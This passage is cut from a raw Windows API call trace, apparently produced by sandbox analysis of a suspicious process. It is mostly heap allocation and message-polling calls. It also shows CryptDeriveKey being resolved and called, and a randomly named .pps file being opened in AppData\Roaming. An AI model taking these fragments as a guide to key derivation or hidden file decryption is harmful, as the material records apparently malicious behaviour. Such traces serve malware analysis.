(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0217.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0217.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0217.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0217.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0217.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0217.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0217.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0217.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0217.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0217.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0217.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0217.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0217.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0217.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0217.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0217.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0217.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0217.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0217.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0217.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0217.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0217.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0217.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0217.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0217.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0217.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0217.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0217.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0217.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51370 [0217.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51370, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0217.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0217.328] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0217.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0217.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0217.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0217.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0217.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0217.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0217.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0217.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0217.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0217.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0217.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0217.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0217.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0217.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0217.329] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87050, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87290) returned 1 [0217.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0217.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0217.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0217.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0217.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0217.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0217.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0217.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0217.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0217.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0217.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0217.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0217.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0217.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0217.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0217.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0217.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0217.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0217.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0217.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0217.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0217.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0217.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0217.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0217.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0217.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0217.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0217.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0217.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0217.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0217.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0217.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0217.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0217.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0217.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0217.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0217.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0217.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0217.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0217.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0217.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0217.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0217.333] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0217.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0217.333] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0217.334] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0217.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0217.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0217.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0217.334] CryptDestroyHash (hHash=0xa87050) returned 1 [0217.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.334] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.334] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0217.334] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0217.334] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.334] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/-ZbS9.pps" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\-zbs9.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0217.335] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.335] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0217.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0217.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0217.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0217.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0217.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0217.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0217.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0217.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0217.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0217.335] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0217.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0217.335] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0217.335] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0217.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0217.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0217.335] RtlAllocateHeap (HeapHandle=0x970000, 